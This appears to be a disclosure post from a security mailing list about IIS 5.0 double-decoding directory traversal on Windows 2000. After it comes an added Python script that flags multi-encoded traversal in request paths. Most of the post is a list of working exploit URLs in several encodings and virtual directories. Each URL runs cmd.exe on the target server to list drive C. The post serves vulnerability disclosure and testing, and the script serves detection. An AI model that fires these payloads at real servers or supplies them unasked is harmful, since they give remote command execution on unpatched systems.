Hi,

We tested various settings in our lab, with different encoding combinations, executable directories, and Win32 configurations. Curiously, not all combinations worked quite the same way on Windows 2000 Server and Professional (even discounting the fact that certain directories exist in one and not in the other, like PBServer or Rpc).

- Windows 2000 Professional + SP1 + IIS5.0 - Default installation

  * The following combinations of directories/encodings work:

    http://www.target.com/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

    http://www.target.com/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\

    http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

- Windows 2000 Server + SP1 + IIS5.0 - Default installation

  * The following combinations of directories/encodings work:

    http://www.target.com/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\

    http://www.target.com/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\

    http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
    http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

It would be interesting if tests were also made by others in NT 4.0 SP6a, since we did not test combinations with other commonly-installed directories, such as cgi-bin, adsamples, _vti_cnf, iisadmpwd, etc.

Regards,

Aldo Albuquerque - CCSA
Tempest Security Technologies - http://www.tempest.com.br
CESAR - Centro de Estudos e Sistemas Avançados do Recife - http://www.cesar.org.br
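A detection-side view of the encodings listed in the message above, as an added example that is not part of the original post: all four variants (`%255c`, `%%35c`, `%%35%63`, `%25%35%63`) become `%5c` after one percent-decoding pass and a backslash after a second, so a log filter can flag request paths whose `..` segments only appear after more than one pass. The function names and the sample list are assumptions made for this sketch.

```python
import re

_ESC = re.compile(r"%([0-9a-fA-F]{2})")

def decode_once(s):
    """One lenient percent-decoding pass; a stray '%' (as in '%%35c') is kept."""
    return _ESC.sub(lambda m: chr(int(m.group(1), 16)), s)

def decode_fully(s, limit=5):
    """Decode until stable; return (result, number of passes that changed it)."""
    passes = 0
    while passes < limit:
        nxt = decode_once(s)
        if nxt == s:
            break
        s, passes = nxt, passes + 1
    return s, passes

def has_dotdot(path):
    """True if any path segment is '..', with '/' or backslash as separator."""
    return ".." in re.split(r"[\\/]", path)

def classify(request_target):
    path = request_target.split("?", 1)[0]   # only the path part is inspected
    final, passes = decode_fully(path)
    if has_dotdot(decode_once(path)):
        return "traversal"                # visible after the normal single decode
    if has_dotdot(final):
        return "multi-decode-traversal"   # only visible after a further decode
    return "multi-encoded" if passes > 1 else "ok"

# Constructed sample: request paths in the four encodings from the post,
# followed by constructed benign and singly-encoded controls.
SAMPLES = [
    "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe",
    "/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe",
    "/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe",
    "/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe",
    "/docs/a%2520b.html",
    "/docs/report%20final.html",
    "/static/..%2fconfig.txt",
]

def scan(targets):
    return [(t, classify(t)) for t in targets]

if __name__ == "__main__":
    for target, verdict in scan(SAMPLES):
        print(f"{verdict:24} {target}")
```

A path that changes on a second decoding pass is worth logging even when no `..` segment results, which is why `multi-encoded` is reported separately.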
